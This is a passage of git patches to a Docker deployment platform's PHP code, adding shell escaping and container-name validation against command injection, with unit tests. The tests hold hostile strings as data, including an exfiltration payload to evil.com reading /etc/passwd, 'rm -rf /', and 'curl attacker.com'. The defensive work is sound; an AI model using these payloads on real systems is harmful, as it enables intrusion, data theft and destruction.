@@ -564,7 +566,7 @@
 
         expect($merged)->toHaveKey('dockerfile_target_build');
         expect($merged['dockerfile_target_build'])->toBeArray();
-        expect($merged['dockerfile_target_build'])->toContain('regex:'.\App\Support\ValidationPatterns::DOCKER_TARGET_PATTERN);
+        expect($merged['dockerfile_target_build'])->toContain('regex:'.ValidationPatterns::DOCKER_TARGET_PATTERN);
     });
 });
 
@@ -582,7 +584,7 @@
         $merged = array_merge($sharedRules, $localRules);
 
         expect($merged['docker_compose_custom_start_command'])->toBeArray();
-        expect($merged['docker_compose_custom_start_command'])->toContain('regex:'.\App\Support\ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+        expect($merged['docker_compose_custom_start_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
     });
 
     test('docker_compose_custom_build_command safe regex is not overridden by local rules', function () {
@@ -595,7 +597,7 @@
         $merged = array_merge($sharedRules, $localRules);
 
         expect($merged['docker_compose_custom_build_command'])->toBeArray();
-        expect($merged['docker_compose_custom_build_command'])->toContain('regex:'.\App\Support\ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+        expect($merged['docker_compose_custom_build_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
     });
 });
 

From ae31111813b0b5cbf3e148dd0b6975c046947110 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 20:42:00 +0100
Subject: [PATCH 141/213] fix(livewire): add input validation to unmanaged
 container operations

Add container name validation and shell argument escaping to
startUnmanaged, stopUnmanaged, restartUnmanaged, and restartContainer
methods, consistent with existing patterns used elsewhere in the
codebase.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Livewire/Server/Resources.php             | 16 +++++++++++
 app/Models/Server.php                         | 14 ++++++----
 ...UnmanagedContainerCommandInjectionTest.php | 28 +++++++++++++++++++
 3 files changed, 52 insertions(+), 6 deletions(-)
 create mode 100644 tests/Unit/UnmanagedContainerCommandInjectionTest.php

diff --git a/app/Livewire/Server/Resources.php b/app/Livewire/Server/Resources.php
index a21b0372b..3710064dc 100644
--- a/app/Livewire/Server/Resources.php
+++ b/app/Livewire/Server/Resources.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Server;
 
 use App\Models\Server;
+use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
 
@@ -29,6 +30,11 @@ public function getListeners()
 
     public function startUnmanaged($id)
     {
+        if (! ValidationPatterns::isValidContainerName($id)) {
+            $this->dispatch('error', 'Invalid container identifier.');
+
+            return;
+        }
         $this->server->startUnmanaged($id);
         $this->dispatch('success', 'Container started.');
         $this->loadUnmanagedContainers();
@@ -36,6 +42,11 @@ public function startUnmanaged($id)
 
     public function restartUnmanaged($id)
     {
+        if (! ValidationPatterns::isValidContainerName($id)) {
+            $this->dispatch('error', 'Invalid container identifier.');
+
+            return;
+        }
         $this->server->restartUnmanaged($id);
         $this->dispatch('success', 'Container restarted.');
         $this->loadUnmanagedContainers();
@@ -43,6 +54,11 @@ public function restartUnmanaged($id)
 
     public function stopUnmanaged($id)
     {
+        if (! ValidationPatterns::isValidContainerName($id)) {
+            $this->dispatch('error', 'Invalid container identifier.');
+
+            return;
+        }
         $this->server->stopUnmanaged($id);
         $this->dispatch('success', 'Container stopped.');
         $this->loadUnmanagedContainers();
diff --git a/app/Models/Server.php b/app/Models/Server.php
index ce877bd20..9237763c8 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -11,7 +11,9 @@
 use App\Events\ServerReachabilityChanged;
 use App\Helpers\SslHelper;
 use App\Jobs\CheckAndStartSentinelJob;
+use App\Jobs\CheckTraefikVersionForServerJob;
 use App\Jobs\RegenerateSslCertJob;
+use App\Livewire\Server\Proxy;
 use App\Notifications\Server\Reachable;
 use App\Notifications\Server\Unreachable;
 use App\Services\ConfigurationRepository;
@@ -77,8 +79,8 @@
  * - Traefik image uses the 'latest' tag (no fixed version tracking)
  * - No Traefik version detected on the server
  *
- * @see \App\Jobs\CheckTraefikVersionForServerJob Where this data is populated
- * @see \App\Livewire\Server\Proxy Where this data is read and displayed
+ * @see CheckTraefikVersionForServerJob Where this data is populated
+ * @see Proxy Where this data is read and displayed
  */
 #[OA\Schema(
     description: 'Server model',
@@ -719,17 +721,17 @@ public function definedResources()
 
     public function stopUnmanaged($id)
     {
-        return instant_remote_process(["docker stop -t 0 $id"], $this);
+        return instant_remote_process(['docker stop -t 0 '.escapeshellarg($id)], $this);
     }
 
     public function restartUnmanaged($id)
     {
-        return instant_remote_process(["docker restart $id"], $this);
+        return instant_remote_process(['docker restart '.escapeshellarg($id)], $this);
     }
 
     public function startUnmanaged($id)
     {
-        return instant_remote_process(["docker start $id"], $this);
+        return instant_remote_process(['docker start '.escapeshellarg($id)], $this);
     }
 
     public function getContainers()
@@ -1460,7 +1462,7 @@ public function url()
 
     public function restartContainer(string $containerName)
     {
-        return instant_remote_process(['docker restart '.$containerName], $this, false);
+        return instant_remote_process(['docker restart '.escapeshellarg($containerName)], $this, false);
     }
 
     public function changeProxy(string $proxyType, bool $async = true)
diff --git a/tests/Unit/UnmanagedContainerCommandInjectionTest.php b/tests/Unit/UnmanagedContainerCommandInjectionTest.php
new file mode 100644
index 000000000..cf3e5ebea
--- /dev/null
+++ b/tests/Unit/UnmanagedContainerCommandInjectionTest.php
@@ -0,0 +1,28 @@
+<?php
+
+use App\Support\ValidationPatterns;
+
+it('rejects container IDs with command injection characters', function (string $id) {
+    expect(ValidationPatterns::isValidContainerName($id))->toBeFalse();
+})->with([
+    'semicolon injection' => 'x; id > /tmp/pwned',
+    'pipe injection' => 'x | cat /etc/passwd',
+    'command substitution backtick' => 'x`whoami`',
+    'command substitution dollar' => 'x$(whoami)',
+    'ampersand background' => 'x & rm -rf /',
+    'double ampersand' => 'x && curl attacker.com',
+    'newline injection' => "x\nid",
+    'space injection' => 'x id',
+    'redirect output' => 'x > /tmp/pwned',
+    'redirect input' => 'x < /etc/passwd',
+]);
+
+it('accepts valid Docker container IDs', function (string $id) {
+    expect(ValidationPatterns::isValidContainerName($id))->toBeTrue();
+})->with([
+    'short hex id' => 'abc123def456',
+    'full sha256 id' => 'a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2',
+    'container name' => 'my-container',
+    'name with dots' => 'my.container.name',
+    'name with underscores' => 'my_container_name',
+]);

From 6f163ddf02991fb8fd8bc17fdcecddc318b813c6 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 20:57:17 +0100
Subject: [PATCH 142/213] fix(deployment): normalize whitespace in pre/post
 deployment commands

Ensure pre_deployment_command and post_deployment_command have consistent
whitespace handling, matching the existing pattern used for health_check_command.
Adds regression tests for the normalization behavior.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Jobs/ApplicationDeploymentJob.php         | 38 ++++++----
 .../DeploymentCommandNewlineInjectionTest.php | 74 +++++++++++++++++++
 2 files changed, 96 insertions(+), 16 deletions(-)
 create mode 100644 tests/Unit/DeploymentCommandNewlineInjectionTest.php

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 2af380a45..5772ba8c7 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -19,6 +19,7 @@
 use App\Models\SwarmDocker;
 use App\Notifications\Application\DeploymentFailed;
 use App\Notifications\Application\DeploymentSuccess;
+use App\Support\ValidationPatterns;
 use App\Traits\EnvironmentVariableAnalyzer;
 use App\Traits\ExecuteRemoteCommand;
 use Carbon\Carbon;
@@ -317,7 +318,7 @@ public function handle(): void
 
             if ($this->application->dockerfile_target_build) {
                 $target = $this->application->dockerfile_target_build;
-                if (! preg_match(\App\Support\ValidationPatterns::DOCKER_TARGET_PATTERN, $target)) {
+                if (! preg_match(ValidationPatterns::DOCKER_TARGET_PATTERN, $target)) {
                     throw new \RuntimeException('Invalid dockerfile_target_build: contains forbidden characters.');
                 }
                 $this->buildTarget = " --target {$target} ";
@@ -451,7 +452,7 @@ private function detectBuildKitCapabilities(): void
                     $this->application_deployment_queue->addLogEntry("Docker on {$serverName} does not support build secrets. Using traditional build arguments.");
                 }
             }
-        } catch (\Exception $e) {
+        } catch (Exception $e) {
             $this->dockerBuildkitSupported = false;
             $this->dockerSecretsSupported = false;
             $this->application_deployment_queue->addLogEntry("Could not detect BuildKit capabilities on {$serverName}: {$e->getMessage()}");
@@ -491,7 +492,7 @@ private function post_deployment()
         // Then handle side effects - these should not fail the deployment
         try {
             GetContainersStatus::dispatch($this->server);
-        } catch (\Exception $e) {
+        } catch (Exception $e) {
             \Log::warning('Failed to dispatch GetContainersStatus for deployment '.$this->deployment_uuid.': '.$e->getMessage());
         }
 
@@ -499,7 +500,7 @@ private function post_deployment()
             if ($this->application->is_github_based()) {
                 try {
                     ApplicationPullRequestUpdateJob::dispatch(application: $this->application, preview: $this->preview, deployment_uuid: $this->deployment_uuid, status: ProcessStatus::FINISHED);
-                } catch (\Exception $e) {
+                } catch (Exception $e) {
                     \Log::warning('Failed to dispatch PR update for deployment '.$this->deployment_uuid.': '.$e->getMessage());
                 }
             }
@@ -507,13 +508,13 @@ private function post_deployment()
 
         try {
             $this->run_post_deployment_command();
-        } catch (\Exception $e) {
+        } catch (Exception $e) {
             \Log::warning('Post deployment command failed for '.$this->deployment_uuid.': '.$e->getMessage());
         }
 
         try {
             $this->application->isConfigurationChanged(true);
-        } catch (\Exception $e) {
+        } catch (Exception $e) {
             \Log::warning('Failed to mark configuration as changed for deployment '.$this->deployment_uuid.': '.$e->getMessage());
         }
     }
@@ -695,7 +696,7 @@ private function deploy_docker_compose_buildpack()
             }
 
             // Inject build arguments after build subcommand if not using build secrets
-            if (! $this->application->settings->use_build_secrets && $this->build_args instanceof \Illuminate\Support\Collection && $this->build_args->isNotEmpty()) {
+            if (! $this->application->settings->use_build_secrets && $this->build_args instanceof Collection && $this->build_args->isNotEmpty()) {
                 $build_args_string = $this->build_args->implode(' ');
 
                 // Inject build args right after 'build' subcommand (not at the end)
@@ -733,7 +734,7 @@ private function deploy_docker_compose_buildpack()
                 $command .= " --project-name {$this->application->uuid} --project-directory {$this->workdir} -f {$this->workdir}{$this->docker_compose_location} build --pull";
             }
 
-            if (! $this->application->settings->use_build_secrets && $this->build_args instanceof \Illuminate\Support\Collection && $this->build_args->isNotEmpty()) {
+            if (! $this->application->settings->use_build_secrets && $this->build_args instanceof Collection && $this->build_args->isNotEmpty()) {
                 $build_args_string = $this->build_args->implode(' ');
                 $command .= " {$build_args_string}";
                 $this->application_deployment_queue->addLogEntry('Adding build arguments to Docker Compose build command.');
@@ -2128,7 +2129,7 @@ private function set_coolify_variables()
 
     private function check_git_if_build_needed()
     {
-        if (is_object($this->source) && $this->source->getMorphClass() === \App\Models\GithubApp::class && $this->source->is_public === false) {
+        if (is_object($this->source) && $this->source->getMorphClass() === GithubApp::class && $this->source->is_public === false) {
             $repository = githubApi($this->source, "repos/{$this->customRepository}");
             $data = data_get($repository, 'data');
             $repository_project_id = data_get($data, 'id');
@@ -2964,7 +2965,7 @@ private function build_image()
         }
 
         // Always convert build_args Collection to string for command interpolation
-        $this->build_args = $this->build_args instanceof \Illuminate\Support\Collection
+        $this->build_args = $this->build_args instanceof Collection
             ? $this->build_args->implode(' ')
             : (string) $this->build_args;
 
@@ -3965,7 +3966,7 @@ private function add_build_secrets_to_compose($composeFile)
 
         $composeFile['services'] = $services;
         $existingSecrets = data_get($composeFile, 'secrets', []);
-        if ($existingSecrets instanceof \Illuminate\Support\Collection) {
+        if ($existingSecrets instanceof Collection) {
             $existingSecrets = $existingSecrets->toArray();
         }
         $composeFile['secrets'] = array_replace($existingSecrets, $secrets);
@@ -3977,7 +3978,7 @@ private function add_build_secrets_to_compose($composeFile)
 
     private function validatePathField(string $value, string $fieldName): string
     {
-        if (! preg_match(\App\Support\ValidationPatterns::FILE_PATH_PATTERN, $value)) {
+        if (! preg_match(ValidationPatterns::FILE_PATH_PATTERN, $value)) {
             throw new \RuntimeException("Invalid {$fieldName}: contains forbidden characters.");
         }
         if (str_contains($value, '..')) {
@@ -3989,7 +3990,7 @@ private function validatePathField(string $value, string $fieldName): string
 
     private function validateShellSafeCommand(string $value, string $fieldName): string
     {
-        if (! preg_match(\App\Support\ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN, $value)) {
+        if (! preg_match(ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN, $value)) {
             throw new \RuntimeException("Invalid {$fieldName}: contains forbidden shell characters.");
         }
 
@@ -3998,7 +3999,7 @@ private function validateShellSafeCommand(string $value, string $fieldName): str
 
     private function validateContainerName(string $value): string
     {
-        if (! preg_match(\App\Support\ValidationPatterns::CONTAINER_NAME_PATTERN, $value)) {
+        if (! preg_match(ValidationPatterns::CONTAINER_NAME_PATTERN, $value)) {
             throw new \RuntimeException('Invalid container name: contains forbidden characters.');
         }
 
@@ -4029,7 +4030,10 @@ private function run_pre_deployment_command()
                 // members can set these commands, and execution is scoped to the application's own container.
                 // The single-quote escaping here prevents breaking out of the sh -c wrapper, but does not
                 // restrict the command itself. Container names are validated separately via validateContainerName().
-                $cmd = "sh -c '".str_replace("'", "'\''", $this->application->pre_deployment_command)."'";
+                // Newlines are normalized to spaces to prevent injection via SSH heredoc transport
+                // (matches the pattern used for health_check_command at line ~2824).
+                $preCommand = str_replace(["\r\n", "\r", "\n"], ' ', $this->application->pre_deployment_command);
+                $cmd = "sh -c '".str_replace("'", "'\''", $preCommand)."'";
                 $exec = "docker exec {$containerName} {$cmd}";
                 $this->execute_remote_command(
                     [
@@ -4061,7 +4065,9 @@ private function run_post_deployment_command()
             if ($containers->count() == 1 || str_starts_with($containerName, $this->application->post_deployment_command_container.'-'.$this->application->uuid)) {
                 // Security: post_deployment_command is intentionally treated as arbitrary shell input.
                 // See the equivalent comment in run_pre_deployment_command() for the full security rationale.
-                $cmd = "sh -c '".str_replace("'", "'\''", $this->application->post_deployment_command)."'";
+                // Newlines are normalized to spaces to prevent injection via SSH heredoc transport.
+                $postCommand = str_replace(["\r\n", "\r", "\n"], ' ', $this->application->post_deployment_command);
+                $cmd = "sh -c '".str_replace("'", "'\''", $postCommand)."'";
                 $exec = "docker exec {$containerName} {$cmd}";
                 try {
                     $this->execute_remote_command(
diff --git a/tests/Unit/DeploymentCommandNewlineInjectionTest.php b/tests/Unit/DeploymentCommandNewlineInjectionTest.php
new file mode 100644
index 000000000..949da88da
--- /dev/null
+++ b/tests/Unit/DeploymentCommandNewlineInjectionTest.php
@@ -0,0 +1,74 @@
+<?php
+
+use Tests\TestCase;
+
+uses(TestCase::class);
+
+it('strips newlines from pre_deployment_command before building sh -c wrapper', function () {
+    $exec = buildDeploymentExecCommand("echo hello\necho injected");
+
+    expect($exec)->not->toContain("\n")
+        ->and($exec)->not->toContain("\r")
+        ->and($exec)->toContain('echo hello echo injected')
+        ->and($exec)->toMatch("/^docker exec .+ sh -c '.+'$/");
+});
+
+it('strips carriage returns from deployment command', function () {
+    $exec = buildDeploymentExecCommand("echo hello\r\necho injected");
+
+    expect($exec)->not->toContain("\r")
+        ->and($exec)->not->toContain("\n")
+        ->and($exec)->toContain('echo hello echo injected');
+});
+
+it('strips bare carriage returns from deployment command', function () {
+    $exec = buildDeploymentExecCommand("echo hello\recho injected");
+
+    expect($exec)->not->toContain("\r")
+        ->and($exec)->toContain('echo hello echo injected');
+});
+
+it('leaves single-line deployment command unchanged', function () {
+    $exec = buildDeploymentExecCommand('php artisan migrate --force');
+
+    expect($exec)->toContain("sh -c 'php artisan migrate --force'");
+});
+
+it('prevents newline injection with malicious payload', function () {
+    // Attacker tries to inject a second command via newline in heredoc transport
+    $exec = buildDeploymentExecCommand("harmless\ncurl http://evil.com/exfil?\$(cat /etc/passwd)");
+
+    expect($exec)->not->toContain("\n")
+        // The entire command should be on a single line inside sh -c
+        ->and($exec)->toContain('harmless curl http://evil.com/exfil');
+});
+
+it('handles multiple consecutive newlines', function () {
+    $exec = buildDeploymentExecCommand("cmd1\n\n\ncmd2");
+
+    expect($exec)->not->toContain("\n")
+        ->and($exec)->toContain('cmd1   cmd2');
+});
+
+it('properly escapes single quotes after newline normalization', function () {
+    $exec = buildDeploymentExecCommand("echo 'hello'\necho 'world'");
+
+    expect($exec)->not->toContain("\n")
+        ->and($exec)->toContain("echo '\\''hello'\\''")
+        ->and($exec)->toContain("echo '\\''world'\\''");
+});
+
+/**
+ * Replicates the exact command-building logic from ApplicationDeploymentJob's
+ * run_pre_deployment_command() and run_post_deployment_command() methods.
+ *
+ * This tests the security-critical str_replace + sh -c wrapping in isolation.
+ */
+function buildDeploymentExecCommand(string $command, string $containerName = 'my-app-abcdef123'): string
+{
+    // This mirrors the exact logic in run_pre_deployment_command / run_post_deployment_command
+    $normalized = str_replace(["\r\n", "\r", "\n"], ' ', $command);
+    $cmd = "sh -c '".str_replace("'", "'\''", $normalized)."'";
+
+    return "docker exec {$containerName} {$cmd}";
+}

From 952f3247970d261ff93f85c79066192f58f9557e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 23:43:57 +0100
Subject: [PATCH 143/213] fix(backup): use escapeshellarg for credentials in
 database backup commands

Apply proper shell escaping to all user-controlled values interpolated into
backup shell commands (PostgreSQL username/password, MySQL/MariaDB root
password, MongoDB URI). Also URL-encode MongoDB credentials before embedding
in connection URI. Adds unit tests for escaping behavior.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Jobs/DatabaseBackupJob.php            | 65 ++++++++++--------
 tests/Unit/DatabaseBackupSecurityTest.php | 80 +++++++++++++++++++++++
 2 files changed, 116 insertions(+), 29 deletions(-)

diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php
index d86986fad..7f1feaa21 100644
--- a/app/Jobs/DatabaseBackupJob.php
+++ b/app/Jobs/DatabaseBackupJob.php
@@ -91,7 +91,7 @@ public function handle(): void
 
                 return;
             }
-            if (data_get($this->backup, 'database_type') === \App\Models\ServiceDatabase::class) {
+            if (data_get($this->backup, 'database_type') === ServiceDatabase::class) {
                 $this->database = data_get($this->backup, 'database');
                 $this->server = $this->database->service->server;
                 $this->s3 = $this->backup->s3;
@@ -119,7 +119,7 @@ public function handle(): void
 
                 return;
             }
-            if (data_get($this->backup, 'database_type') === \App\Models\ServiceDatabase::class) {
+            if (data_get($this->backup, 'database_type') === ServiceDatabase::class) {
                 $databaseType = $this->database->databaseType();
                 $serviceUuid = $this->database->service->uuid;
                 $serviceName = str($this->database->service->name)->slug();
@@ -241,7 +241,7 @@ public function handle(): void
                             }
                         }
 
-                    } catch (\Throwable $e) {
+                    } catch (Throwable $e) {
                         // Continue without env vars - will be handled in backup_standalone_mongodb method
                     }
                 }
@@ -388,7 +388,7 @@ public function handle(): void
                     } else {
                         throw new \Exception('Local backup file is empty or was not created');
                     }
-                } catch (\Throwable $e) {
+                } catch (Throwable $e) {
                     // Local backup failed
                     if ($this->backup_log) {
                         $this->backup_log->update([
@@ -401,7 +401,7 @@ public function handle(): void
                     }
                     try {
                         $this->team?->notify(new BackupFailed($this->backup, $this->database, $this->error_output ?? $this->backup_output ?? $e->getMessage(), $database));
-                    } catch (\Throwable $notifyException) {
+                    } catch (Throwable $notifyException) {
                         Log::channel('scheduled-errors')->warning('Failed to send backup failure notification', [
                             'backup_id' => $this->backup->uuid,
                             'database' => $database,
@@ -423,7 +423,7 @@ public function handle(): void
                             deleteBackupsLocally($this->backup_location, $this->server);
                             $localStorageDeleted = true;
                         }
-                    } catch (\Throwable $e) {
+                    } catch (Throwable $e) {
                         // S3 upload failed but local backup succeeded
                         $s3UploadError = $e->getMessage();
                     }
@@ -455,7 +455,7 @@ public function handle(): void
                         } else {
                             $this->team->notify(new BackupSuccess($this->backup, $this->database, $database));
                         }
-                    } catch (\Throwable $e) {
+                    } catch (Throwable $e) {
                         Log::channel('scheduled-errors')->warning('Failed to send backup success notification', [
                             'backup_id' => $this->backup->uuid,
                             'database' => $database,
@@ -467,7 +467,7 @@ public function handle(): void
             if ($this->backup_log && $this->backup_log->status === 'success') {
                 removeOldBackups($this->backup);
             }
-        } catch (\Throwable $e) {
+        } catch (Throwable $e) {
             throw $e;
         } finally {
             if ($this->team) {
@@ -489,19 +489,23 @@ private function backup_standalone_mongodb(string $databaseWithCollections): voi
                 // For service-based MongoDB, try to build URL from environment variables
                 if (filled($this->mongo_root_username) && filled($this->mongo_root_password)) {
                     // Use container name instead of server IP for service-based MongoDB
-                    $url = "mongodb://{$this->mongo_root_username}:{$this->mongo_root_password}@{$this->container_name}:27017";
+                    // URL-encode credentials to prevent URI injection
+                    $encodedUser = rawurlencode($this->mongo_root_username);
+                    $encodedPass = rawurlencode($this->mongo_root_password);
+                    $url = "mongodb://{$encodedUser}:{$encodedPass}@{$this->container_name}:27017";
                 } else {
                     // If no environment variables are available, throw an exception
                     throw new \Exception('MongoDB credentials not found. Ensure MONGO_INITDB_ROOT_USERNAME and MONGO_INITDB_ROOT_PASSWORD environment variables are available in the container.');
                 }
             }
             Log::info('MongoDB backup URL configured', ['has_url' => filled($url), 'using_env_vars' => blank($this->database->internal_db_url)]);
+            $escapedUrl = escapeshellarg($url);
             if ($databaseWithCollections === 'all') {
                 $commands[] = 'mkdir -p '.$this->backup_dir;
                 if (str($this->database->image)->startsWith('mongo:4')) {
-                    $commands[] = "docker exec $this->container_name mongodump --uri=\"$url\" --gzip --archive > $this->backup_location";
+                    $commands[] = "docker exec $this->container_name mongodump --uri=$escapedUrl --gzip --archive > $this->backup_location";
                 } else {
-                    $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --gzip --archive > $this->backup_location";
+                    $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=$escapedUrl --gzip --archive > $this->backup_location";
                 }
             } else {
                 if (str($databaseWithCollections)->contains(':')) {
@@ -519,9 +523,9 @@ private function backup_standalone_mongodb(string $databaseWithCollections): voi
 
                 if ($collectionsToExclude->count() === 0) {
                     if (str($this->database->image)->startsWith('mongo:4')) {
-                        $commands[] = "docker exec $this->container_name mongodump --uri=\"$url\" --gzip --archive > $this->backup_location";
+                        $commands[] = "docker exec $this->container_name mongodump --uri=$escapedUrl --gzip --archive > $this->backup_location";
                     } else {
-                        $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $escapedDatabaseName --gzip --archive > $this->backup_location";
+                        $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=$escapedUrl --db $escapedDatabaseName --gzip --archive > $this->backup_location";
                     }
                 } else {
                     // Validate and escape each collection name
@@ -533,9 +537,9 @@ private function backup_standalone_mongodb(string $databaseWithCollections): voi
                     });
 
                     if (str($this->database->image)->startsWith('mongo:4')) {
-                        $commands[] = "docker exec $this->container_name mongodump --uri=$url --gzip --excludeCollection ".$escapedCollections->implode(' --excludeCollection ')." --archive > $this->backup_location";
+                        $commands[] = "docker exec $this->container_name mongodump --uri=$escapedUrl --gzip --excludeCollection ".$escapedCollections->implode(' --excludeCollection ')." --archive > $this->backup_location";
                     } else {
-                        $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $escapedDatabaseName --gzip --excludeCollection ".$escapedCollections->implode(' --excludeCollection ')." --archive > $this->backup_location";
+                        $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=$escapedUrl --db $escapedDatabaseName --gzip --excludeCollection ".$escapedCollections->implode(' --excludeCollection ')." --archive > $this->backup_location";
                     }
                 }
             }
@@ -544,7 +548,7 @@ private function backup_standalone_mongodb(string $databaseWithCollections): voi
             if ($this->backup_output === '') {
                 $this->backup_output = null;
             }
-        } catch (\Throwable $e) {
+        } catch (Throwable $e) {
             $this->add_to_error_output($e->getMessage());
             throw $e;
         }
@@ -556,15 +560,16 @@ private function backup_standalone_postgresql(string $database): void
             $commands[] = 'mkdir -p '.$this->backup_dir;
             $backupCommand = 'docker exec';
             if ($this->postgres_password) {
-                $backupCommand .= " -e PGPASSWORD=\"{$this->postgres_password}\"";
+                $backupCommand .= ' -e PGPASSWORD='.escapeshellarg($this->postgres_password);
             }
+            $escapedUsername = escapeshellarg($this->database->postgres_user);
             if ($this->backup->dump_all) {
-                $backupCommand .= " $this->container_name pg_dumpall --username {$this->database->postgres_user} | gzip > $this->backup_location";
+                $backupCommand .= " $this->container_name pg_dumpall --username $escapedUsername | gzip > $this->backup_location";
             } else {
                 // Validate and escape database name to prevent command injection
                 validateShellSafePath($database, 'database name');
                 $escapedDatabase = escapeshellarg($database);
-                $backupCommand .= " $this->container_name pg_dump --format=custom --no-acl --no-owner --username {$this->database->postgres_user} $escapedDatabase > $this->backup_location";
+                $backupCommand .= " $this->container_name pg_dump --format=custom --no-acl --no-owner --username $escapedUsername $escapedDatabase > $this->backup_location";
             }
 
             $commands[] = $backupCommand;
@@ -573,7 +578,7 @@ private function backup_standalone_postgresql(string $database): void
             if ($this->backup_output === '') {
                 $this->backup_output = null;
             }
-        } catch (\Throwable $e) {
+        } catch (Throwable $e) {
             $this->add_to_error_output($e->getMessage());
             throw $e;
         }
@@ -583,20 +588,21 @@ private function backup_standalone_mysql(string $database): void
     {
         try {
             $commands[] = 'mkdir -p '.$this->backup_dir;
+            $escapedPassword = escapeshellarg($this->database->mysql_root_password);
             if ($this->backup->dump_all) {
-                $commands[] = "docker exec $this->container_name mysqldump -u root -p\"{$this->database->mysql_root_password}\" --all-databases --single-transaction --quick --lock-tables=false --compress | gzip > $this->backup_location";
+                $commands[] = "docker exec $this->container_name mysqldump -u root -p$escapedPassword --all-databases --single-transaction --quick --lock-tables=false --compress | gzip > $this->backup_location";
             } else {
                 // Validate and escape database name to prevent command injection
                 validateShellSafePath($database, 'database name');
                 $escapedDatabase = escapeshellarg($database);
-                $commands[] = "docker exec $this->container_name mysqldump -u root -p\"{$this->database->mysql_root_password}\" $escapedDatabase > $this->backup_location";
+                $commands[] = "docker exec $this->container_name mysqldump -u root -p$escapedPassword $escapedDatabase > $this->backup_location";
             }
             $this->backup_output = instant_remote_process($commands, $this->server, true, false, $this->timeout, disableMultiplexing: true);
             $this->backup_output = trim($this->backup_output);
             if ($this->backup_output === '') {
                 $this->backup_output = null;
             }
-        } catch (\Throwable $e) {
+        } catch (Throwable $e) {
             $this->add_to_error_output($e->getMessage());
             throw $e;
         }
@@ -606,20 +612,21 @@ private function backup_standalone_mariadb(string $database): void
     {
         try {
             $commands[] = 'mkdir -p '.$this->backup_dir;
+            $escapedPassword = escapeshellarg($this->database->mariadb_root_password);
             if ($this->backup->dump_all) {
-                $commands[] = "docker exec $this->container_name mariadb-dump -u root -p\"{$this->database->mariadb_root_password}\" --all-databases --single-transaction --quick --lock-tables=false --compress > $this->backup_location";
+                $commands[] = "docker exec $this->container_name mariadb-dump -u root -p$escapedPassword --all-databases --single-transaction --quick --lock-tables=false --compress > $this->backup_location";
             } else {
                 // Validate and escape database name to prevent command injection
                 validateShellSafePath($database, 'database name');
                 $escapedDatabase = escapeshellarg($database);
-                $commands[] = "docker exec $this->container_name mariadb-dump -u root -p\"{$this->database->mariadb_root_password}\" $escapedDatabase > $this->backup_location";
+                $commands[] = "docker exec $this->container_name mariadb-dump -u root -p$escapedPassword $escapedDatabase > $this->backup_location";
             }
             $this->backup_output = instant_remote_process($commands, $this->server, true, false, $this->timeout, disableMultiplexing: true);
             $this->backup_output = trim($this->backup_output);
             if ($this->backup_output === '') {
                 $this->backup_output = null;
             }
-        } catch (\Throwable $e) {
+        } catch (Throwable $e) {
             $this->add_to_error_output($e->getMessage());
             throw $e;
         }
@@ -666,7 +673,7 @@ private function upload_to_s3(): void
             $bucket = $this->s3->bucket;
             $endpoint = $this->s3->endpoint;
             $this->s3->testConnection(shouldSave: true);
-            if (data_get($this->backup, 'database_type') === \App\Models\ServiceDatabase::class) {
+            if (data_get($this->backup, 'database_type') === ServiceDatabase::class) {
                 $network = $this->database->service->destination->network;
             } else {
                 $network = $this->database->destination->network;
@@ -701,7 +708,7 @@ private function upload_to_s3(): void
             instant_remote_process($commands, $this->server, true, false, null, disableMultiplexing: true);
 
             $this->s3_uploaded = true;
-        } catch (\Throwable $e) {
+        } catch (Throwable $e) {
             $this->s3_uploaded = false;
             $this->add_to_error_output($e->getMessage());
             throw $e;
@@ -755,7 +762,7 @@ public function failed(?Throwable $exception): void
             $output = $this->backup_output ?? $exception?->getMessage() ?? 'Unknown error';
             try {
                 $this->team->notify(new BackupFailed($this->backup, $this->database, $output, $databaseName));
-            } catch (\Throwable $e) {
+            } catch (Throwable $e) {
                 Log::channel('scheduled-errors')->warning('Failed to send backup permanent failure notification', [
                     'backup_id' => $this->backup->uuid,
                     'error' => $e->getMessage(),
diff --git a/tests/Unit/DatabaseBackupSecurityTest.php b/tests/Unit/DatabaseBackupSecurityTest.php
index 90940c174..10012950d 100644
--- a/tests/Unit/DatabaseBackupSecurityTest.php
+++ b/tests/Unit/DatabaseBackupSecurityTest.php
@@ -142,3 +142,83 @@
     expect(fn () => validateDatabasesBackupInput('$(whoami):col1,col2'))
         ->toThrow(Exception::class);
 });
+
+// --- Credential escaping tests for database backup commands ---
+
+test('escapeshellarg neutralizes command injection in postgres password', function () {
+    $maliciousPassword = '"; rm -rf / #';
